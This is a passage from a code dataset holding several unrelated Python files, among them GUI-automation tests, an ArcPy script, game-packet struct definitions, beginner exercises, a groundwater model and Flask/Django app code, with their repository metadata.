'IM')\n\t\tself.COProcess = conf.get('process', 'CO')\n\t\tself.SuspernsionCtrlProcess = conf.get('process', 'SuspernsionCtrl')\n\t\t# 读取窗口名称\n\t\tself.BECivilWin = conf.get('window', 'BECivil')\n\t\tself.IMWin = conf.get('window', 'IM')\n\n\tdef start_BECivli(self):\n\t\t\"\"\"登录BECivil\"\"\"\n\n\t\t# 判断屏幕分辨率是否为1920*1080\n\t\tif verifySystemMetrics(1920, 1080) == True:\n\t\t\tpass\n\t\telse:\n\t\t\traise Exception(\"分辨率不为1920*1080,请更改分辨率\")\n\n\t\t# 判断Shell、BECivil和IM是否存在,若存在则退出\n\t\tprocesses = [ProcessControl(self.IMProcess), ProcessControl(self.BECivilProcess), ProcessControl(self.ShellProcess)]\n\t\tfor process in processes:\n\t\t\tif process.exists():\n\t\t\t\tprocess.close()\n\n\t\t# 启动软件以及登录\n\t\ttry:\n\t\t\tautoit.run(self.path)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tprint('软件安装路径有误,或者软件安装路径中有中文,\\nstart_APP函数中path变量前需要加r!')\n\t\telse:\n\t\t\tw1 = WinControl('用户登录')\n\t\t\tw1.wait()\n\t\t\tif w1.exists():\n\t\t\t\tw1.controlSetText('[CLASS:Edit; INSTANCE:1]', self.username)\n\t\t\t\tw1.controlSetText('[CLASS:Edit; INSTANCE:2]', self.password)\n\t\t\t\tw1.controlSetText('[CLASS:Edit; INSTANCE:3]', self.ip)\n\t\t\t\tw1.controlClick('Button1')\n\t\t\t\t# 等待BECivil界面\n\t\t\t\tw2 = WinControl(self.BECivilWin)\n\t\t\t\tw2.wait(25)\n\t\t\t\tw2.setState(3)\n\t\t\t\tsleep(1)\n\t\t\t\t\"\"\"\n\t\t\t\t# 退出CO进程\n\t\t\t\tps = [ProcessControl(self.COProcess), ProcessControl(self.SuspernsionCtrlProcess)]\n\t\t\t\tfor p in ps:\n\t\t\t\t\tp.wait(6)\n\t\t\t\t\tp.close()\n\t\t\t\t\"\"\"\n\n\tdef start_IM(self):\n\t\t\"\"\"启动IM\"\"\"\n\n\t\tif WinControl(self.BECivilWin).exists():\n\t\t\tm1 = MouseControl()\n\t\t\tm1.click(self.BECivilWin, '', screen_point.资料[0], screen_point.资料[1])\n\t\t\tsleep(1)\n\t\t\tm1.click(self.BECivilWin, '', screen_point.质检计量[0], screen_point.质检计量[1])\n\t\t\t# 等待IM界面\n\t\t\tw1 = WinControl(self.IMWin)\n\t\t\tw1.wait(30)\n\t\t\t# 关闭筑业升级进程\n\t\t\tif autoit.process_exists(\"ZY.Downloader.exe\"):\n\t\t\t\tautoit.process_close(\"ZY.Downloader.exe\")\n\t\t\telse:\n\t\t\t\tpass\n\t\t\tw1.setState(3)\n\t\telse:\n\t\t\tprint('BECivil未启动,无法启动IM。')\n\n\tdef quit_BECivil(self):\n\t\t\"\"\"退出BECivil\"\"\"\n\n\t\tp = ProcessControl(self.BECivilProcess)\n\t\tif p.exists():\n\t\t\tp.close()\n\n\tdef quit_IM(self):\n\t\t\"\"\"退出IM\"\"\"\n\n\t\tp = ProcessControl(self.IMProcess)\n\t\tif p.exists():\n\t\t\tp.close()\n\n\nclass ContractManagement():\n\n\n\tdef __init__(self):\n\t\t# 读取配置文件\n\t\tconf = configparser.ConfigParser()\n\t\tconf.read(r\"F:\\pythondemo\\自动化测试脚本\\质检计量\\IMconfig.ini\")\n\t\t# 读取窗口名称\n\t\tself.BECivilWin = conf.get('window', 'BECivil')\n\t\tself.IMWin = conf.get('window', 'IM')\n\t\t# 读取需要输入文字\n\t\tself.message1 = conf.get('messages', '合同编号')\n\t\tself.message2 = conf.get('messages', '合同金额')\n\t\tself.message3 = conf.get('messages', '建设单位')\n\t\tself.message4 = conf.get('messages', '施工单位')\n\t\tself.message5 = conf.get('messages', '起止桩号')\n\t\tself.message6 = conf.get('messages', '合同段长度')\n\t\tself.message7 = conf.get('messages', '标段号')\n\t\tself.message8 = conf.get('messages', '项目名称')\n\t\tself.message9 = conf.get('messages', '监理名称')\n\t\tself.message10 = conf.get('messages', '结束桩号')\n\t\tself.message11 = conf.get('messages', '工期')\n\t\tself.message12 = conf.get('messages', '施工负责人')\n\t\tself.message13 = conf.get('messages', '总监理工程师')\n\t\tself.message14 = conf.get('messages', '项目总工')\n\n\tdef creat_contract_management(self):\n\t\t# 新增合同\n\n\t\tif WinControl(self.IMWin).exists():\n\t\t\tm1 = MouseControl()\n\t\t\tm1.click(self.IMWin, '', screen_point.选择项目部[0], screen_point.选择项目部[1])\n\t\t\tsleep(1)\n\t\t\tm1.click(self.IMWin, '', screen_point.工程管理[0], screen_point.工程管理[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.合同管理[0], screen_point.合同管理[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.新增施工合同[0], screen_point.新增施工合同[1])\n\t\t\tsleep(5)\n\t\t\tm1.click(self.IMWin, '', screen_point.合同编号[0], screen_point.合同编号[1])\n\t\t\tautoit.send(self.message1)\n\t\t\tm1.click(self.IMWin, '', screen_point.合同金额[0], screen_point.合同金额[1])\n\t\t\tautoit.send(self.message2)\n\t\t\tm1.click(self.IMWin, '', screen_point.合同签订日期[0], screen_point.合同签订日期[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.今天签订[0], screen_point.今天签订[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.建设单位[0], screen_point.建设单位[1])\n\t\t\tautoit.send(self.message3)\n\t\t\tm1.click(self.IMWin, '', screen_point.施工单位[0], screen_point.施工单位[1])\n\t\t\tautoit.send(self.message4)\n\t\t\tm1.click(self.IMWin, '', screen_point.起止桩号[0], screen_point.起止桩号[1])\n\t\t\tautoit.send(self.message5)\n\t\t\tm1.click(self.IMWin, '', screen_point.合同段长度[0], screen_point.合同段长度[1])\n\t\t\tautoit.send(self.message6)\n\t\t\tm1.click(self.IMWin, '', screen_point.计划开工日期[0], screen_point.计划开工日期[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.今天开工[0], screen_point.今天开工[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.标段号[0], screen_point.标段号[1])\n\t\t\tautoit.send(self.message7)\n\t\t\tm1.click(self.IMWin, '', screen_point.项目名称[0], screen_point.项目名称[1])\n\t\t\tautoit.send(self.message8)\n\t\t\tm1.click(self.IMWin, '', screen_point.监理名称[0], screen_point.监理名称[1])\n\t\t\tautoit.send(self.message9)\n\t\t\tm1.click(self.IMWin, '', screen_point.结束桩号[0], screen_point.结束桩号[1])\n\t\t\tautoit.send(self.message10)\n\t\t\tm1.click(self.IMWin, '', screen_point.计划完工日期[0], screen_point.计划完工日期[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.今天完工[0], screen_point.今天完工[1])\n\t\t\tm1.move(self.IMWin, '', 960, 590)\n\t\t\tautoit.mouse_wheel('down', 2)\n\t\t\tm1.click(self.IMWin, '', screen_point.工期[0], screen_point.工期[1])\n\t\t\tautoit.send(self.message11)\n\t\t\tm1.click(self.IMWin, '', screen_point.保存[0], screen_point.保存[1])\n\t\telse:\n\t\t\traise Exception('没有检测到IM窗口!')\n\n\tdef edit_contract_management(self):\n\t\t\"\"\"编辑合同\"\"\"\n\n\t\tif WinControl(self.IMWin).exists():\n\t\t\tm1 = MouseControl()\n\t\t\tm1.click(self.IMWin, '', screen_point.编辑施工合同[0], screen_point.编辑施工合同[1])\n\t\t\tsleep(3)\n\t\t\tm1.click(self.IMWin, '', screen_point.施工负责人[0], screen_point.施工负责人[1])\n\t\t\tautoit.send(self.message12)\n\t\t\tm1.click(self.IMWin, '', screen_point.总监理工程师[0], screen_point.总监理工程师[1])\n\t\t\tautoit.send(self.message13)\n\t\t\tm1.click(self.IMWin, '', screen_point.项目总工[0], screen_point.项目总工[1])\n\t\t\tautoit.send(self.message14)\n\t\t\tm1.click(self.IMWin, '', screen_point.保存[0], screen_point.保存[1])\n\t\telse:\n\t\t\traise Exception('没有检测到IM窗口!')\n\n\tdef delete_contract_managemeng(self):\n\t\t\"\"\"删除合同\"\"\"\n\n\t\tif WinControl(self.IMWin).exists():\n\t\t\tm1 = MouseControl()\n\t\t\tm1.click(self.IMWin, '', screen_point.工程管理[0], screen_point.工程管理[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.合同管理[0], screen_point.合同管理[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.删除施工合同[0], screen_point.删除施工合同[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.确认删除合同[0], screen_point.确认删除合同[1])\n\t\telse:\n\t\t\traise Exception('没有检测到IM窗口!')\n\n\n# 检查各对象是否出错\nif __name__ == '__main__':\n\tb = Base()\n\tcm = ContractManagement()\n\tb.start_BECivli()\n\tb.start_IM()\n\tsleep(30)\n\tcm.creat_contract_management()\n\tsleep(25)\n\tcm.edit_contract_management()\n\t#cm.delete_contract_managemeng()\n\t#b.quit_IM()\n\t#b.quit_BECivil()\n","repo_name":"Simonluepang/Upgrading-is-the-happiest-thing","sub_path":"UserInterface/AotuIt/CivilFunction/Functions/basic_functions/baseclass.py","file_name":"baseclass.py","file_ext":"py","file_size_in_byte":8482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"31172439033","text":"import os\r\nimport arcpy\r\nimport logging\r\n\r\nif __name__ == '__main__':\r\n\r\n # The logging setting has done\r\n logging.basicConfig(filename=\"file.log\",\r\n level=logging.INFO,\r\n format='%(levelname)s %(asctime)s %(message)s')\r\n logging.info(\"All setting of the logging is done\")\r\n\r\n # Set all the paths\r\n path = os.getcwd()\r\n aprx_path = os.path.join(path, \"ArcGIS\\Project_01\\Project_01.aprx\")\r\n gdb_path = os.path.join(path, \"ACC.gdb\")\r\n symbology_path = os.path.join(path, \"Symbology\")\r\n logging.info(\"All paths are defined\")\r\n\r\n # Read aprx project\r\n if arcpy.Exists(aprx_path):\r\n aprx_project = arcpy.mp.ArcGISProject(aprx_path)\r\n logging.info(\"aprx project is read\")\r\n else:\r\n logging.error(\"aprx project is not exist\")\r\n\r\n # Select the first map\r\n map_1 = aprx_project.listMaps()[0]\r\n\r\n # Set the path of the gdb as environment\r\n arcpy.env.workspace = gdb_path\r\n\r\n # Select all the symbologies inside the directory\r\n symbology_list = []\r\n symbology_list = [item.split(\".\")[0] for item in os.listdir(symbology_path)]\r\n\r\n list_layers = map_1.listLayers()\r\n layer_names = [layer.name for layer in list_layers]\r\n fclist = arcpy.ListFeatureClasses()\r\n\r\n for fc in fclist:\r\n if fc not in layer_names and fc in symbology_list:\r\n lay = gdb_path + os.sep + fc\r\n map_1.addDataFromPath(lay)\r\n logging.info(f\"{fc} is added to the map\")\r\n\r\n for i in range(len(map_1.listLayers())):\r\n for j in symbology_list:\r\n if map_1.listLayers()[i].name == j:\r\n lyrx_path = symbology_path + os.sep + j + \".lyrx\"\r\n arcpy.management.ApplySymbologyFromLayer(map_1.listLayers()[i],\r\n lyrx_path,\r\n None, \"DEFAULT\")\r\n logging.info(f\"symbology of the {j} is changed\")\r\n\r\n aprx_project.save()\r\n logging.info(\"Project is saved\")\r\n","repo_name":"AmirSarrafzadeh/ArcPy_Change_Symbology","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37388951017","text":"from ctypes import *\n\nfrom FFxivPythonTrigger.memory.struct_factory import OffsetStruct\n\n\nclass ServerActionEffectHeader(OffsetStruct({\n 'animation_target_id': c_uint,\n 'unk1': c_uint,\n 'action_id': c_uint,\n 'global_effect_counter': c_uint,\n 'animation_lock_time': c_float,\n 'some_target_id': c_uint,\n 'hidden_animation': c_ushort,\n 'rotation': c_ushort,\n 'action_animation_id': c_ushort,\n 'variantion': c_ubyte,\n 'effect_display_type': c_ubyte,\n 'unk2': c_ubyte,\n 'effect_count': c_ubyte,\n 'padding': c_ushort,\n})):\n animation_target_id: int\n unk1: int\n action_id: int\n global_effect_counter: int\n animation_lock_time: float\n some_target_id: int\n hidden_animation: int\n rotation: int\n action_animation_id: int\n variantion: int\n effect_display_type: int\n unk2: int\n effect_count: int\n padding: int\n\n\nclass ServerActionEffectEntry(OffsetStruct({\n 'type': c_ubyte,\n 'param1': c_ubyte,\n 'param2': c_ubyte,\n 'param3': c_ubyte,\n 'param4': c_ubyte,\n 'param5': c_ubyte,\n 'main_param': c_ushort,\n})):\n type: int\n param1: int\n param2: int\n param3: int\n param4: int\n param5: int\n main_param: int\n\n\nclass ServerActionEffectType:\n max_count = 0\n header: ServerActionEffectHeader\n padding1: int\n padding2: int\n effects: list[list[ServerActionEffectEntry]]\n padding3: int\n padding4: int\n target_id: list[int]\n padding5: int\n\n\nclass ServerActionEffect1(OffsetStruct({\n 'header': ServerActionEffectHeader,\n 'padding1': c_uint,\n 'padding2': c_ushort,\n 'effects': ServerActionEffectEntry * 8 * 1,\n 'padding3': c_ushort,\n 'padding4': c_uint,\n 'target_id': c_ulonglong * 1,\n 'padding5': c_uint,\n}), ServerActionEffectType):\n max_count = 1\n\n\nclass ServerActionEffect8(OffsetStruct({\n 'header': ServerActionEffectHeader,\n 'padding1': c_uint,\n 'padding2': c_ushort,\n 'effects': ServerActionEffectEntry * 8 * 8,\n 'padding3': c_ushort,\n 'padding4': c_uint,\n 'target_id': c_ulonglong * 8,\n 'padding5': c_uint,\n}, 0x27c), ServerActionEffectType):\n max_count = 8\n\n\nclass ServerActionEffect16(OffsetStruct({\n 'header': ServerActionEffectHeader,\n 'padding1': c_uint,\n 'padding2': c_ushort,\n 'effects': ServerActionEffectEntry * 8 * 16,\n 'padding3': c_ushort,\n 'padding4': c_uint,\n 'target_id': c_ulonglong * 16,\n 'padding5': c_uint,\n}, 0x4BC), ServerActionEffectType):\n max_count = 16\n\n\nclass ServerActionEffect24(OffsetStruct({\n 'header': ServerActionEffectHeader,\n 'padding1': c_uint,\n 'padding2': c_ushort,\n 'effects': ServerActionEffectEntry * 8 * 24,\n 'padding3': c_ushort,\n 'padding4': c_uint,\n 'target_id': c_ulonglong * 24,\n 'padding5': c_uint,\n}), ServerActionEffectType):\n max_count = 24\n\n\nclass ServerActionEffect32(OffsetStruct({\n 'header': ServerActionEffectHeader,\n 'padding1': c_uint,\n 'padding2': c_ushort,\n 'effects': ServerActionEffectEntry * 8 * 32,\n 'padding3': c_ushort,\n 'padding4': c_uint,\n 'target_id': c_ulonglong * 32,\n 'padding5': c_uint,\n}), ServerActionEffectType):\n max_count = 32\n\n\nclass ServerActionEffectDisplayType:\n HideActionName = 0\n ShowActionName = 1\n ShowItemName = 2\n MountName = 13\n\n\nSWING_TYPES = {\n 0x1: {'ability', 'miss'},\n 0x2: {'ability'},\n 0x3: {'ability'},\n 0x4: {'healing'},\n 0x5: {'blocked', 'ability'},\n 0x6: {'parry', 'ability'},\n 0x7: {'invincible'},\n 0xA: {'power_drain'},\n 0xB: {'power_healing'},\n 0xD: {'tp_healing'},\n 0xE: {'buff', 'to_target'},\n 0xF: {'buff', 'to_source'},\n 0x18: {'threat'},\n 0x19: {'threat'},\n 0x1B: {'combo'},\n 0x20: {'knock_back'},\n 0x21: {'absorb'},\n 0x33: {'instant_death'},\n # 0x34: {'buff'},\n 0x37: {'buff', 'resistance'},\n 0x3D: {'gauge_add'},\n}\n\nTYPE_HAVE_AMOUNT = {'ability', 'healing', 'power_drain', 'power_healing''tp_healing'}\nTYPE_HAVE_CRITICAL_DIRECT = {'ability', 'healing'}\nABILITY_TYPE = {\n 1: {'physics', 'blow'},\n 2: {'physics', 'slash'},\n 3: {'physics', 'spur'},\n 4: {'physics', 'shoot'},\n 5: {'magic'},\n 6: {'diablo'},\n 7: {'sonic'},\n 8: {'limit_break'},\n}\nABILITY_SUB_TYPE = {\n 1: {'fire'},\n 2: {'ice'},\n 3: {'wind'},\n 4: {'ground'},\n 5: {'thunder'},\n 6: {'water'},\n 7: {'unaspected'},\n}\n","repo_name":"AutumnInSouth/FFxivPythonTrigger3","sub_path":"plugins/XivNetwork/message_processors/zone_server/ability/struct.py","file_name":"struct.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"35"} +{"seq_id":"7331754507","text":"# 이진 힙\n'''\n완전이진트리는 1번 노드부터 빈틈없이 만들어지는 트리이기 때문에\n트리를 리스트로 구현했을 때\n자식노드 N에 대해 부모노드는 N//2\n왼쪽노드가 n * 2, 오른쪽 노드가 n * 2 + 1\n'''\n\nfor t in range(int(input())):\n N = int(input())\n lst = list(map(int, input().split()))\n h = [0] * (N + 1)\n last = 0\n for n in lst:\n last += 1\n h[last] = n\n c = last\n # 부모노드가 존재하고 자식노드 < 부모노드이면\n # 위치 바꿔주기\n while c//2 > 0 and h[c] < h[c//2]:\n h[c], h[c//2] = h[c//2], h[c]\n c = c//2\n c = last // 2\n sol = 0\n # 조상노드 합 구하기\n # 노드가 존재하면\n while c > 0:\n sol += h[c]\n c = c//2\n\n print(f'#{t + 1} {sol}')","repo_name":"minguno/TIL","sub_path":"Algorithm/0317_algorithm/bin_heap_min.py","file_name":"bin_heap_min.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4207529295","text":"'''\nCreated on 2 dic. 2019\n\n@author: Ruby\n'''\n'''\nEn python no existen los arrays de forma nativa, solo las listas\n\nPueden ser implementados con un modulo llamado 'array'\n\nLas listas son una implementacion mas poderosa de los arrays\n \n'''\nedades = [20, 36, 37, 18]\n\ntemperaturas = []\n#temperaturas[0] = 32.25 NO SE PERMITE EN LAS LISTAS\n\n# para guardar informacion en un vector se usa la funcion APPEND\ntemperaturas.append(32.54)\n\nprint(edades[0])\nprint(len(edades))\nprint(len(temperaturas))\n\nvectorMagico = [\"Ruby\", 30, \"Berumen\", 50, True, 56.38]\n\nprint(\"Cuantas calificaciones deseas ingresar: \")\ncantidad=int(input())\n\ncalificaciones=[]\nfor i in range(cantidad):\n calificaciones.append(int(input(\"Ingresa calificacion: \")))\n \nprint(calificaciones)\n\n\n\n","repo_name":"RubyBerumen/1roISC","sub_path":"FDP/Sesion30_Ejemplo_Vectores/Ejemplo_Vectores.py","file_name":"Ejemplo_Vectores.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34503729534","text":"#METHODS OF DICTIONARY\r\n\r\n#clear()-Removes all the elements from dictionary\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\nl1.clear()\r\nprint(l1)\r\n\r\n\r\n#copy()-Returns a copy of the dictionary\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\ni=l1.copy()\r\nprint(i)\r\n\r\n#fromkeys()-Returns a dictionary with a specified keys and value\r\n#creates a dictionary with 3 \r\ni=('k1','k2','k3')\r\nj=7\r\nl1=dict.fromkeys(i,j)\r\nprint(l1)\r\n\r\n#get()-Returns the value of the specified key\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\ni=l1.get(\"k2\")\r\nprint(i)\r\n\r\n#items()-Returns a list containing tuple for each key-value pairs\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\ni=l1.items()\r\nprint(i)\r\n\r\n#keys()-Returns a list containing dictionary's keys\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\ni=l1.keys()\r\nprint(i)\r\n\r\n#pop()-Removes the element with a specified key\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\nl1.pop(\"k2\")\r\nprint(l1)\r\n\r\n#popitem()-Returns the last inserted key-value pair\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\nl1.popitem()\r\nprint(l1)\r\n\r\n#setdefault()-Returns the value of the specified key. If the key does not exist: insert the key, with the specified value\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\nl1.setdefault(\"k4\", \"SHIVAM\")\r\nprint(l1)\r\n\r\n#update()-Updates the dictionary with the specified key-value pairs\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\nl1.update({\"k5\":\"tree\"})\r\nprint(l1)\r\n\r\n#values()-Returns a list of all values in the dictionary\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\ni=l1.values()\r\nprint(i)","repo_name":"SHIVAMKUMAR51/Practice_python2","sub_path":"dictionary_methods.py","file_name":"dictionary_methods.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"19399820813","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 25 13:30:46 2012\n\n@author: Sat Kumar Tomer\n@website: www.ambhas.com\n@email: satkumartomer@gmail.com\n\nthis module reads the data from xls file\nperform the lumped grounwater level modelling\nthen save the output as xls file and images\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xlrd, xlwt\nfrom ambhas.gw import GW_1D\nimport scikits.timeseries as ts\nimport scikits.timeseries.lib.plotlib as tpl\n\n\ndef gw_model_file(in_fname, out_fname, figure_dir=None):\n \"\"\"\"\n input:\n in_fname: name of input xls file\n out_fname: name of the output xls file\n figure_dir: name of the directory where to save the out figures\n \"\"\"\n\n # read the data from xls file\n in_book = xlrd.open_workbook(in_fname)\n sheet_names = in_book.sheet_names()\n sheet_names.remove('legend')\n \n out_book = xlwt.Workbook()\n for sheet_name in sheet_names:\n \n sheet = in_book.sheet_by_name(sheet_name)\n # read the input for one well\n t = sheet.nrows-1\n year = np.empty(t, 'int')\n month = np.empty(t, 'int')\n rainfall = np.empty(t)\n pumping = np.empty(t)\n meas_gwl = np.empty(t)\n r = np.empty(t)\n for i in range(t):\n year[i] = sheet.cell_value(i+1,0)\n month[i] = sheet.cell_value(i+1,1)\n rainfall[i] = sheet.cell_value(i+1,2)\n pumping[i] = sheet.cell_value(i+1,3)\n meas_gwl[i] = sheet.cell_value(i+1,4)\n r[i] = sheet.cell_value(i+1,5)\n F = sheet.cell_value(1,6)\n G = sheet.cell_value(1,7)\n hmin = sheet.cell_value(1,8)\n \n # run the model\n gw_model = GW_1D(rainfall, pumping)\n gw_model.set_parameters(F, G, r, hmin)\n \n hini = meas_gwl[0]\n gw_model.run_model(hini,t)\n sim_gwl = gw_model.h\n lam = gw_model.lam\n sy = gw_model.sy\n discharge = gw_model.discharge\n print('Sy = %.5f'%sy)\n \n #write the output\n sheet = out_book.add_sheet(sheet_name)\n sheet.write(0,0,'year')\n sheet.write(0,1,'month')\n sheet.write(0,2,'rainfall')\n sheet.write(0,3,'pumping')\n sheet.write(0,4,'measured gwl')\n sheet.write(0,5,'simulated gwl')\n sheet.write(0,6,'recharge')\n sheet.write(0,7,'discharge')\n sheet.write(0,8,'lambda')\n sheet.write(0,9,'sy')\n for i in range(t):\n sheet.write(i+1,0,year[i])\n sheet.write(i+1,1,month[i])\n sheet.write(i+1,2,rainfall[i])\n sheet.write(i+1,3,pumping[i])\n sheet.write(i+1,4,meas_gwl[i])\n sheet.write(i+1,5,sim_gwl[i])\n sheet.write(i+1,6,rainfall[i]*r[i])\n sheet.write(i+1,7,discharge[i])\n sheet.write(1,8,lam)\n sheet.write(1,9,sy)\n \n first_date = ts.Date(freq='M',year=year[0],month=month[1])\n gw_meas_series = ts.time_series(meas_gwl, start_date=first_date)\n gw_sim_series = ts.time_series(sim_gwl, start_date=first_date)\n \n if figure_dir is not None:\n # save the figure\n fig = plt.figure(figsize=(6, 4.5))\n plt.plot(gw_meas_series, 'r', lw=3, label='measured')\n plt.plot(gw_sim_series, 'g', lw=3, label='simulated')\n plt.legend(loc='best')\n plt.ylabel('Groundwater Level' )\n plt.savefig(figure_dir+'%s.png'%sheet_name)\n plt.close()\n \n print('%s completed succesfully'%sheet_name)\n \n # save the xls file\n out_book.save(out_fname)\n\nif __name__=='__main__':\n in_file = '/home/tomer/svn/ambhas/examples/input_easy_gw.xls'\n out_file = '/home/tomer/svn/ambhas/examples/output/easy_gw.xls'\n figure_dir = '/home/tomer/svn/ambhas-wiki/images/'\n foo = gw_model_file(in_file, out_file, figure_dir)\n \n","repo_name":"rkawsar/ambhas","sub_path":"ambhas/easy_gw_1d.py","file_name":"easy_gw_1d.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"25015666523","text":"from django import template\n\nregister = template.Library()\n\n\n# Custom filter tag to load in templates\n@register.filter(name='dict_length') # name of the filter to use in templates\ndef dict_length(parent, key):\n my_dict = parent.get(key, {})\n\n return len(my_dict.keys())\n\n\n# tags can take multiple params and can have access to the context data from template\n@register.simple_tag(name='cart_data')\ndef get_cart_data(parent, key):\n my_dict = parent.get(key, {})\n\n return len(my_dict.keys())\n\n\n@register.inclusion_tag(filename='bookings/tags/cart.html', name='cart_link')\ndef get_cart_link(session):\n cart = session.get('cart', {})\n\n return {\n 'items': len(cart.keys()),\n }\n","repo_name":"AlexandruFlorea/f1-car-rental-app","sub_path":"bookings/templatetags/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18310023765","text":"from flask import Flask, render_template, url_for, url_for, Blueprint, request,redirect,flash\nfrom .models import Fabric, Product, Design, VariantMaster\nfrom . import db\n\nprod = Blueprint('products', __name__)\n\n@prod.route('/products', methods=['GET','POST'])\ndef main():\n \n fabrics = Fabric.query.all()\n allproducts = Product.query.all()\n allvariants = VariantMaster.query.all()\n alldesings = ''\n if request.form:\n pid = int(request.form.get('product_select'))\n p = Product.query.get(pid)\n alldesings = p.designs\n return render_template('products.html',\n fabrics=fabrics, allproducts=allproducts, alldesings=alldesings,\n allvariants=allvariants)\n\n@prod.route('/addFabrics', methods=['POST'])\ndef add_fabric():\n if request.form:\n fabric_name = request.form.get('fabric_name').title()\n f = Fabric.query.filter_by(fabric_name=fabric_name).first()\n if f:\n flash('Fabric Already Ceated', category='alert-danger')\n return redirect(url_for('products.main'))\n else: \n fabric = Fabric(fabric_name = fabric_name)\n db.session.add(fabric)\n db.session.commit()\n flash('Fabric Created', category='alert-success')\n return redirect(url_for('products.main'))\n\n@prod.route('/addProducts', methods=['POST'])\ndef add_product():\n if request.form:\n f_id = request.form.get('fabric_select')\n product_name = request.form.get('product_name').title()\n p = Product.query.filter_by(product_name=product_name).first()\n if p:\n flash('Product Already Created', category='alert-danger')\n return redirect(url_for('products.main'))\n else:\n product = Product(fabric_id=f_id, product_name=product_name)\n db.session.add(product)\n db.session.commit()\n flash('Product Created', category='alert-success')\n return redirect(url_for('products.main'))\n\n@prod.route('/addDesigns', methods=['POST'])\ndef add_design():\n if request.form:\n pid = request.form.get('product_name')\n p = Product.query.get(pid)\n p1 = p.designs\n print(p1)\n des = [i.design_no for i in p1]\n print(des)\n if p:\n num = int(request.form.get('design_no'))\n if num in des:\n flash('Design Already Registered', category='alert-danger')\n return redirect(url_for('products.main'))\n else:\n p.addDesign(num)\n flash('Design Created', category='alert-success')\n return redirect(url_for('products.main'))\n\n@prod.route('/addVaraints', methods=['POST'])\ndef add_variants():\n if request.form:\n v = request.form.get('variant_name').title()\n if v:\n vq = VariantMaster.query.filter_by(variant_name=v).first()\n if vq:\n flash(f'{vq.variant_name} is already Registered', category='alert-danger')\n return redirect(url_for('products.main'))\n else:\n v1 = VariantMaster(variant_name=v)\n db.session.add(v1)\n db.session.commit()\n flash(f'{v1.variant_name} Added to Master', category='alert-success')\n return redirect(url_for('products.main'))\n\n@prod.route('/addItem', methods=['POST'])\ndef add_item():\n if request.form:\n design_no = request.form.get('design_select')\n d = Design.query.get(design_no)\n if d:\n vid = request.form.getlist('varaint_name')\n for v in vid:\n v = int(v)\n d.addinventory(product_id=d.product_id, design_id=d.did, var_id=v)\n flash(f'Added {d.pduct.product_name} DesNo {d.design_no}V{v}') \n return redirect(url_for('products.main'))\n\n return redirect(url_for('products.main'))\n\n\n\n\n \n\n \n\n \n\n","repo_name":"infected-dev/IMS","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42453091097","text":"class Solution:\n def findShortestSubArray(self, nums: List[int]) -> int:\n \n count = defaultdict(int)\n \n extent = defaultdict(lambda : [-1,-1])\n \n maximum = 0\n \n for index, val in enumerate(nums):\n \n count[val]+=1\n if count[val]==1:\n extent[val][0]=index\n extent[val][1]=index\n maximum = max(maximum, count[val])\n \n ans = len(nums)\n for val in count:\n if count[val] == maximum :\n ans = min ( ans, (extent[val][1]- extent[val][0])+1)\n print(ans)\n return ans\n ","repo_name":"bekiTil/a2sv","sub_path":"0697-degree-of-an-array/0697-degree-of-an-array.py","file_name":"0697-degree-of-an-array.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"46851510098","text":"from pickle import PUT\nfrom flask import Flask, redirect,url_for,session,make_response\nfrom flask import request\nimport threading\nimport shutil\nimport glob\nimport os\nimport pytube\nimport json\nimport datetime\nimport time\nimport traceback\n\napp = Flask(__name__,static_url_path='',static_folder='web')\n\nimport karaoke\n\njobid = 1\nqueue = []\nconversions = []\nsongs = []\n\nglobal reftime\nreftime = datetime.datetime.now()\n\ndef mainPage():\n fl = 